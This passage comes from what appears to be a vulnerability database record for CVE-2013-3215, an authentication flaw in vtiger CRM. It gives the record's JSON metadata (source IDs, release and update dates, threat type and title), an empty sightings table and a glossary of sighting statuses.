"id": "CNNVD-201308-010"
},
{
"db": "NVD",
"id": "CVE-2013-3215"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-29T00:00:00",
"db": "VULHUB",
"id": "VHN-63217"
},
{
"date": "2013-08-01T00:00:00",
"db": "BID",
"id": "61559"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"date": "2013-08-02T03:11:59",
"db": "PACKETSTORM",
"id": "122648"
},
{
"date": "2014-01-07T04:14:36",
"db": "PACKETSTORM",
"id": "124698"
},
{
"date": "2013-08-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-010"
},
{
"date": "2020-01-29T18:15:12.077000",
"db": "NVD",
"id": "CVE-2013-3215"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-01-31T00:00:00",
"db": "VULHUB",
"id": "VHN-63217"
},
{
"date": "2014-01-09T00:40:00",
"db": "BID",
"id": "61559"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007109"
},
{
"date": "2020-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-010"
},
{
"date": "2020-01-31T19:54:10.247000",
"db": "NVD",
"id": "CVE-2013-3215"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-010"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "vtiger\u00a0CRM\u00a0 Vulnerabilities in authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007109"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-010"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.